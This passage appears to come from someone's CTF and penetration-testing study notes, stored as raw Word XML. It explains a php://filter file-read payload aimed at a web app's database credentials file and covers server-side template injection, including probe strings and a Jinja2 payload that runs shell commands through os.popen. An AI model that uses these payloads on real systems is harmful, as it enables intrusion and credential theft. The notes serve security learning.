      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cvss&gt;test&lt;/cvss&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;reward&gt;&amp;file;&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C61">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notice it has the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter/read=convert.base64-encode/resource=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" stuff. It's a PHP-specific feature for filtering streams</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is a PHP stream wrapper that allows you to manipulate file streams using filters. It can modify the content of the file being read, such as encoding it, decoding it, or performing other transformations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read=convert.base64-encode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This specifies a filter operation to be applied to the file content. In this case:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicates that the operation will be applied when reading the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">convert.base64-encode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that the content of the file will be Base64-encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C69">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resource=/var/www/html/db.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This specifies the file to be accessed. In this case, it is /var/www/html/db.php, which might contain sensitive information, such as database credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C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6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yo2pz1bh9y07" w:id="388"/>
      <w:bookmarkEnd w:id="388"/>
      <w:hyperlink r:id="rId938">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SSTI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Server Side Template Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId939">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Good guide for SSTI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Port swigger)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3352800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="228" name="image232.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image232.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId940"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="335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C72">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C73">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try These:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%= 7*7 %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">${{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#{7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If any of these output 49, then that means we might have SSTI. For example, in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId941">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SSTI1 picoCTF</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the first one gave an output of 49. So, we used the {{ }} notion. In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId942">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, they crafted this SSTI payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'whoami'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1287"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with any command you want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1287"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this CTF, we did "ls", and then saw the "flag" file. So we did "cat flag", where we got the flag!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is an SSTI?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-side template injection is a vulnerability where the attacker injects malicious input into a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">template </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute commands</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the server. It's often mistaken for XSS, since they both involve injecting malicious code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To put it plainly an SSTI is an exploitation technique where the attacker injects native (to the Template Engine) code into a web page. The code is then run via the Template Engine and the attacker gains code execution on the affected server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack is very common on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Node.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">websites and there is a good possibility that a Template Engine is being used to reflect the email that the user inputs in the contact field.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is also very common on Flask (as shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId943">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C88">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8igim39rt51o" w:id="389"/>
      <w:bookmarkEnd w:id="389"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where SSTI is seen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want more in-depth practice, look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId944">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bike Starting Point Box</w:t>
        </w:r>
      </w:hyperlink>
